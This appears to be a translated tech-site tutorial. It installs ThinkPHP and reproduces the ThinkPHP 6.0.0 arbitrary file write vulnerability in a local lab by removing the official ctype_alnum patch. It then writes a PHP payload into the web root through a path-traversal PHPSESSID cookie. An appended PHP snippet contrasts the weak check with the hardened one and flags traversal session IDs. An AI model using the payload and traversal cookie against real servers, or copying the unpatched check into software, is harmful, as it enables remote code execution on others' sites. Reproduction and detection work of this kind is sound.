2025-01-19 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
This article walks through installing ThinkPHP 6.0.7 and reproducing the ThinkPHP 6.0.0 arbitrary file write vulnerability. The steps are given in detail; I hope they are useful to anyone interested.
ThinkPHP 6.0.7 installation
I. First prepare the environment: phpStudy with PHP 7.1.13.
II. Then download the Composer installer and install it into the phpStudy PHP 7.1.13 path.
This path is arbitrary.
This path will allow
After opening the command line, run the install command:
composer create-project topthink/think tp
After the download finishes, move the tp folder to the folder you normally serve the site from.
Configuration information
Modify the configuration file under /tp/config
The last setting was wrong: app_namespace true changed to false.
Verify the parameter information.
ThinkPHP 6.0.0 arbitrary file write vulnerability reproduction
I. First, download the source code:
composer create-project topthink/think tp 6.0.0
Then move it to the directory you want to serve the site from.
Visit: 127.0.0.1:8086/cms2021/tp/public/
The installation succeeded: Version 6.0.0.
php think run (starts the development server)
II. Deploying the vulnerable environment
Vulnerable file location:
\tp\vendor\topthink\framework\src\think\session\Store.php
Points to note:
Step 1: Remove the official patch, i.e. the ctype_alnum function check on line 121. It is applied, after the 32-character check, to the session ID taken from the UA header or cookie information.
Step 2: Add the following to \tp\app\controller\index.php:
use think\facade\Session;
// inside the index method: read parameter a and write it into the session
$test = request()->only(['a']);
Session::set('test', $test['a']);
Note the location of the addition.
Step 3: Enable the session middleware. In tp\app\middleware.php, uncomment:
\think\middleware\SessionInit::class
III. Reproducing the vulnerability
http://127.0.0.1/tp/public/index.php?a=%3C?php%20phpinfo();?%3E
After sending this request there is no output on the page, so check the site's runtime directory:
\tp\runtime\session
There you will find the value stored in serialized form.
IV. Capture the request, modify the session ID, and write the session file to the website root directory
PHPSESSID=../../../../123456789chongxqweq.php (the file to write)
Note: PHPSESSID must be 32 characters; if the write does not succeed, delete characters until it does.
Verification
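The root cause of the write described above is that the session ID from the cookie is used as part of a file name after only a length check, so the official patch added an alphanumeric (ctype_alnum) requirement. The following is an added example (not ThinkPHP's own code) that contrasts a length-only check with the hardened check the article refers to, and adds a small classifier a defender can use to log or alert on suspicious PHPSESSID values. Function names and the sample cookie values are constructed for this illustration; the only assumption taken from the article is the rule "exactly 32 characters and alphanumeric, otherwise generate a fresh ID".

```php
<?php
// Added example, not code from the ThinkPHP project or the original article.
// Assumed rule (as described in the article): an incoming session ID is used
// only if it is exactly 32 characters AND passes ctype_alnum; otherwise the
// application generates a fresh ID.
declare(strict_types=1);

/**
 * Length-only check: the weak behaviour the article exercises. A traversal
 * string padded to 32 characters passes and ends up in the session file path.
 */
function acceptsIdLengthOnly($id): bool
{
    return is_string($id) && strlen($id) === 32;
}

/**
 * Hardened check: 32 characters AND only [A-Za-z0-9], so slashes, dots and
 * NUL bytes can never reach the file name built from the session ID.
 */
function acceptsIdHardened($id): bool
{
    return is_string($id) && strlen($id) === 32 && ctype_alnum($id);
}

/**
 * Session ID to actually use: the supplied one if it passes the hardened
 * check, otherwise a freshly generated 32-hex-character ID.
 * (session_create_id() requires PHP >= 7.1.)
 */
function resolveSessionId($id): string
{
    return acceptsIdHardened($id) ? $id : md5(microtime(true) . session_create_id());
}

/**
 * Detection helper: returns a human-readable reason when a cookie value does
 * not look like a legitimate session ID, or null when it looks normal.
 * Suitable for writing to an application log or forwarding to a SIEM.
 */
function describeSessionIdRisk($id): ?string
{
    if (!is_string($id)) {
        return 'non-string value';
    }
    if (strpos($id, "\0") !== false) {
        return 'contains NUL byte';
    }
    if (preg_match('#\.\.|[/\\\\]#', $id)) {
        return 'contains path traversal characters';
    }
    if (strlen($id) !== 32) {
        return 'length is ' . strlen($id) . ', expected 32';
    }
    if (!ctype_alnum($id)) {
        return 'contains non-alphanumeric characters';
    }
    return null;
}

// Constructed sample cookie values (not captured traffic).
$samples = [
    'a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6',       // normal-looking 32-char ID
    str_pad('../../../../evil.php', 32, 'x'),  // traversal padded to 32 chars
    '../../../../short.php',                   // traversal, wrong length
    'abc',                                     // far too short
];

foreach ($samples as $s) {
    printf(
        "%-40s length-only:%-7s hardened:%-7s risk:%s\n",
        var_export($s, true),
        acceptsIdLengthOnly($s) ? 'accept' : 'reject',
        acceptsIdHardened($s) ? 'accept' : 'reject',
        describeSessionIdRisk($s) ?? 'none'
    );
    // resolveSessionId() always yields a safe ID, generating one when needed
    assert(acceptsIdHardened(resolveSessionId($s)));
}
```

Running the script shows the padded traversal value being accepted by the length-only check and rejected by the hardened one, which is exactly the gap the removed patch closes. The risk classifier is deliberately stricter than the acceptance check: it reports traversal characters before the length mismatch, so a short probe such as the third sample is still logged with the more useful reason.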
That covers installing ThinkPHP 6.0.7 and reproducing the ThinkPHP 6.0.0 arbitrary file write vulnerability. I hope the content above helps you learn something new; if you think the article is good, please share it so that more people can see it.
© 2024 shulou.com SLNews company. All rights reserved.